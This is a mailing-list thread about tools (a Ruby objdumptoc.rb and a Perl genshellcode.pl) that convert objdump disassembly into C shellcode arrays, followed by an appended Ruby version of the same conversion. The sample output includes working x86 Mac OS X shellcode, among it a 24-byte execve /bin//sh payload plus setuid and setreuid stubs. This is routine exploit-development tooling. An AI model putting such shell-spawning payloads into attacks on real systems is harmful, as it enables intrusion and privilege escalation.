[framework-hackers] create shellcode from objdump
Ramon de Carvalho Valle
ramon at risesecurity.org
Wed Feb 13 23:28:29 CST 2008
There is also a similar tool in Ruby that I wrote to format the assembly
components released in the unixasm project. It is called objdumptoc.rb and
is included in unixasm.
http://www.risesecurity.org/project/unixasm/unixasm-1.1.0.tar.gz
Here follows an example.
[ramon at localhost ~]$ as -o osx-x86-shellcode.o devel/unixasm/trunk/osx-x86-shellcode.s
[ramon at localhost ~]$ objdump -dM suffix osx-x86-shellcode.o | ruby devel/unixasm/trunk/objdumptoc.rb
char _start[]= /* 12 bytes */
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x50" /* pushl %eax */
"\x50" /* pushl %eax */
"\x50" /* pushl %eax */
"\x66\xb8\x37\x01" /* movw $0x137,%ax */
"\xcd\x80" /* int $0x80 */
;
char setreuidcode[]= /* 9 bytes */
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x50" /* pushl %eax */
"\x50" /* pushl %eax */
"\xb0\x7e" /* movb $0x7e,%al */
"\xcd\x80" /* int $0x80 */
;
char setuidcode[]= /* 8 bytes */
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x50" /* pushl %eax */
"\xb0\x17" /* movb $0x17,%al */
"\xcd\x80" /* int $0x80 */
;
char exitcode[]= /* 7 bytes */
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\xb0\x01" /* movb $0x1,%al */
"\xcd\x80" /* int $0x80 */
;
char shellcode[]= /* 24 bytes */
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f */
"\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x54" /* pushl %esp */
"\x54" /* pushl %esp */
"\x53" /* pushl %ebx */
"\x50" /* pushl %eax */
"\xb0\x3b" /* movb $0x3b,%al */
"\xcd\x80" /* int $0x80 */
;
[ramon at localhost ~]$
Best regards,
Ramon
Prince Brave wrote:
> Usage:
> Assuming that you have optimized your code, then you can just use
> objdump -d yourprogram | genshellcode.pl
> to generate a C char array to store shellcode. If yourprogram is just what was
> compiled from C source, then maybe you want to supply the -v option to show
> the '\xnn' code with symbols, that is
> objdump -d yourprogram | genshellcode.pl -v
>
> How:
> It's a quite simple script; it just translates the one-byte machine code 'nn' in
> the output of objdump to the form '\xnn' that can be used in a C array, and
> filters out whatever else. This eliminates the time for generating our shellcode manually.
>
> Note: feel free to modify and use it. And if there is some fault, please let me know!
>
> #!/usr/bin/env perl
> =begin comment
> file: genshellcode.pl
> usage: genshellcode.pl [-v] yourdumpfile
>        genshellcode.pl < yourfile
> and you can use it in a pipe
> or use the -v option to show with symbols
> use this script to generate a shellcode array for a C program from objdump -d
> you may modify the variable $code_perline to define how many '\xnn' to show
> by: Wang ziyong
> =end comment
> =cut
> use warnings;
> use strict;
> use Getopt::Std;
> my $verbose=0;
> my %options=();
> getopts('v',\%options);
> $verbose=1 if defined $options{v};
> my $code_perline=15;   # '\xnn' escapes per output line
> my $code=0;            # escapes already emitted on the current output line
> print "char shellcode[]=\n\"" if !$verbose;
> while(<>){
>     # select lines containing machine code: "<addr>:<TAB><hex bytes>[<TAB><mnemonic>]"
>     # objdump pads the address to the width of the largest address in the file,
>     # so accept any width (a fixed 7-character field does not match a .o dump)
>     if(/^\s*[0-9a-f]+:\t([0-9a-f ]{2,})(\t.*)?/){
>         my $opcodes=$1;
>         # remove any trailing blank
>         $opcodes =~ s/\s+$//;
>         # convert machine code 'nn' to '\xnn' and wrap every $code_perline bytes
>         my @opcode=split(/ /,$opcodes);
>         foreach(@opcode){
>             print "\\x",$_;
>             $code+=1;
>             unless($code < $code_perline){
>                 print "\"\n\"" if !$verbose;
>                 print "\n" if $verbose;
>                 $code=0;
>             }
>         }
>     }else{
>         next if $_ eq "\n";
>         # in verbose mode keep the non-code lines (section and symbol headers)
>         # as separators and start a fresh byte line after them
>         if($verbose){
>             print "\n\n",$_;
>             $code=0;
>         }
>     }
> }
> # close the C string; $code is reset to 0 on every full line, so the else
> # branch is never taken, and the trailing "" it would avoid is still valid C
> if($code != $code_perline){
>     print "\";\n" if !$verbose;
>     print "\n" if $verbose;
> }else{
>     print ";" if !$verbose;
> }
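As an added example (not objdumptoc.rb and not the genshellcode.pl quoted above), here is a Ruby version of the same objdump-to-C-array conversion that tolerates objdump's variable address width and instructions whose bytes wrap onto a second line, and emits the per-instruction layout shown in the objdumptoc.rb output earlier in this message. The dump text is constructed; the `wide` symbol and its 10-byte instruction are hypothetical.

```ruby
# Constructed sample of `objdump -d` output (not a real file): the page's exitcode
# sequence plus a hypothetical 10-byte instruction that objdump wraps onto a second line.
SAMPLE_DUMP = [
  "sample.o:     file format elf32-i386",
  "Disassembly of section .text:",
  "00000000 <exitcode>:",
  "   0:\t31 c0                \txorl   %eax,%eax",
  "   2:\t50                   \tpushl  %eax",
  "   3:\tb0 01                \tmovb   $0x1,%al",
  "   5:\tcd 80                \tint    $0x80",
  "00000007 <wide>:",
  "   7:\tc7 05 88 77 66 55 44 \tmovl   $0x11223344,0x55667788",
  "   e:\t33 22 11 ",
].join("\n") + "\n"
# "<addr>:<TAB><hex bytes>[<TAB><mnemonic>]"; the address width is not fixed
# (genshellcode.pl's original regex assumed exactly 7 characters, which a .o dump lacks).
INSN_RE = /\A *([0-9a-f]+):\t((?:[0-9a-f]{2} ?)+) *(?:\t(.*))?\z/
SYM_RE  = /\A[0-9a-f]+ <([^>]+)>:\s*\z/
# Returns { symbol => [[bytes, mnemonic], ...] }; a line carrying bytes but no
# mnemonic is the continuation of the previous (long) instruction.
def parse_objdump(text)
  funcs = {}
  cur = nil
  text.each_line do |line|
    line = line.chomp
    if (m = SYM_RE.match(line))
      cur = funcs[m[1]] = []
    elsif cur && (m = INSN_RE.match(line))
      bytes = m[2].split.map { |h| h.to_i(16) }
      mnem = m[3].to_s.strip.squeeze(' ')
      if mnem.empty?
        cur.last[0].concat(bytes) if cur.last
      else
        cur << [bytes, mnem]
      end
    end
  end
  funcs
end
# One string literal per instruction, its mnemonic as a comment, byte total in the header.
def to_c_array(name, insns)
  total = insns.sum { |bytes, _| bytes.size }
  lines = ["char #{name}[]= /* #{total} bytes */"]
  insns.each do |bytes, mnem|
    lines << "\"#{bytes.map { |b| format('\\x%02x', b) }.join}\" /* #{mnem} */"
  end
  lines << ';'
  lines.join("\n")
end
parse_objdump(SAMPLE_DUMP).each { |name, insns| puts to_c_array(name, insns) }
```

To run it on a real dump, replace SAMPLE_DUMP with the text of `objdump -dM suffix file.o` (for example via ARGF.read).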